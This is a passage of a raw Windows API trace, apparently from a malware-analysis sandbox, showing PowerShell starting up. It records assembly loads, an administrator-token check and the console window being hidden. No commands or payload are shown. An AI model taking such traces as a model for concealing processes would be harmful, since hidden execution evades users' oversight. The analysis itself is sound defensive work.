lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.045] GetLastError () returned 0xcb [0050.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.066] GetLastError () returned 0xcb [0050.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.067] GetLastError () returned 0xcb [0050.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.067] GetLastError () returned 0xcb [0050.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0050.202] GetLastError () returned 0x0 [0050.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0050.202] GetLastError () returned 0x0 [0050.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.217] GetLastError () returned 0xcb [0050.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.219] GetLastError () returned 0xcb [0050.254] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.254] GetLastError () returned 0x7e [0050.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.255] GetLastError () returned 0x7e [0050.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0050.597] GetLastError () returned 0x2 [0050.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0050.597] GetLastError () returned 0x2 [0050.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, 
lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.673] GetLastError () returned 0x57 [0050.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.673] GetLastError () returned 0x57 [0050.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0050.788] GetLastError () returned 0x2 [0050.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0050.788] GetLastError () returned 0x2 [0050.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.906] GetLastError () returned 0x2 [0050.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.906] GetLastError () returned 0x2 [0050.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.941] GetLastError () returned 0xcb [0050.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.942] GetLastError () returned 0xcb [0050.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.942] GetLastError () returned 0xcb [0050.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.942] GetLastError () returned 0xcb [0051.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.011] GetLastError () returned 0xcb [0051.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14e8fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0051.061] GetLastError () returned 0x2 [0051.061] SetErrorMode (uMode=0x1) returned 0x1 [0051.061] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14eda4 | out: lpFileInformation=0x14eda4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.062] GetLastError () returned 0x2 [0051.062] SetErrorMode (uMode=0x1) returned 0x1 [0051.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e9b8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.224] GetLastError () returned 0x0 [0051.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.224] GetLastError () returned 0x0 [0051.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.225] GetLastError () returned 0x0 [0051.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.227] GetLastError () returned 0xcb [0051.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.229] GetLastError () returned 0xcb [0051.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.229] GetLastError () returned 0xcb [0051.232] CoCreateGuid (in: pguid=0x14ee84 | out: pguid=0x14ee84*(Data1=0x7ca05c4b, Data2=0xed15, Data3=0x4e10, Data4=([0]=0xb9, [1]=0x66, [2]=0x53, [3]=0x13, [4]=0xfa, [5]=0xa5, [6]=0x6a, [7]=0x36))) returned 0x0 [0051.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.235] GetLastError () 
returned 0xcb [0051.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.237] GetLastError () returned 0xcb [0051.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.239] GetLastError () returned 0xcb [0051.244] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0051.244] GetLastError () returned 0x0 [0051.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14ed64 | out: lpConsoleScreenBufferInfo=0x14ed64) returned 1 [0051.246] GetLastError () returned 0x0 [0051.248] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0051.248] GetLastError () returned 0x0 [0051.248] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14ed64 | out: lpConsoleScreenBufferInfo=0x14ed64) returned 1 [0051.248] GetLastError () returned 0x0 [0051.249] GetVersionExW (in: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0051.249] GetLastError () returned 0x0 [0051.250] GetCurrentProcess () returned 0xffffffff [0051.250] GetLastError () returned 0x3f0 [0051.251] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x14ed74 | out: TokenHandle=0x14ed74*=0x31c) returned 1 [0051.251] GetLastError () returned 0x3f0 [0051.255] GetTokenInformation 
(in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14edcc | out: TokenInformation=0x0, ReturnLength=0x14edcc) returned 0 [0051.255] GetLastError () returned 0x7a [0051.256] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e3d30 [0051.256] GetLastError () returned 0x7a [0051.256] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x2e3d30, TokenInformationLength=0x4, ReturnLength=0x14edcc | out: TokenInformation=0x2e3d30, ReturnLength=0x14edcc) returned 1 [0051.256] GetLastError () returned 0x7a [0051.257] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14ed84 | out: phNewToken=0x14ed84*=0x314) returned 1 [0051.257] GetLastError () returned 0x7f [0051.257] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14edcc | out: TokenInformation=0x0, ReturnLength=0x14edcc) returned 0 [0051.257] GetLastError () returned 0x7a [0051.257] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e3cb0 [0051.257] GetLastError () returned 0x7a [0051.258] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x2e3cb0, TokenInformationLength=0x4, ReturnLength=0x14edcc | out: TokenInformation=0x2e3cb0, ReturnLength=0x14edcc) returned 1 [0051.258] GetLastError () returned 0x7a [0051.258] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x1fc29a8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14ed60 | out: IsMember=0x14ed60) returned 1 [0051.258] GetLastError () returned 0x7a [0051.258] CloseHandle (hObject=0x314) returned 1 [0051.258] GetLastError () returned 0x7a [0051.258] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.258] GetLastError () returned 0x7a [0051.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.258] GetLastError () returned 0x7a [0051.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.258] GetLastError () returned 0x7a [0051.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.259] GetLastError () returned 0x7a [0051.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, 
lpBuffer=0x14e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.277] GetLastError () returned 0x7a [0051.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.277] GetLastError () returned 0x7a [0051.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.277] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", 
lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.321] SetConsoleCtrlHandler (HandlerRoutine=0x1c8384a, Add=1) returned 1 [0051.321] GetLastError () returned 0x7a [0051.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.362] GetLastError () returned 0xcb [0051.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.363] GetLastError () returned 0xcb [0051.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.680] GetLastError () returned 0xcb [0051.880] GetConsoleWindow () returned 0x301e4 [0051.881] ShowWindow (hWnd=0x301e4, nCmdShow=0) returned 0 [0051.899] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314 [0051.899] GetLastError () returned 0x0 [0051.900] CoCreateGuid (in: pguid=0x14ed98 | out: pguid=0x14ed98*(Data1=0xb7dddb26, Data2=0x1245, Data3=0x4693, Data4=([0]=0x8d, [1]=0x9f, [2]=0x26, [3]=0x8d, [4]=0x66, [5]=0x67, [6]=0x42, [7]=0xc5))) returned 0x0 [0051.987] WinSqmIsOptedIn () returned 0x0 [0051.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.987] GetLastError () returned 0xcb [0051.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.990] GetLastError () returned 0xcb [0051.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | 
out: lpBuffer="") returned 0x0 [0051.990] GetLastError () returned 0xcb [0051.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.991] GetLastError () returned 0xcb [0051.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.991] GetLastError () returned 0xcb [0051.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.995] GetLastError () returned 0xcb [0051.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.995] GetLastError () returned 0xcb [0051.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.995] GetLastError () returned 0xcb [0051.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.997] GetLastError () returned 0xcb [0052.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.001] GetLastError () returned 0xcb [0052.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: 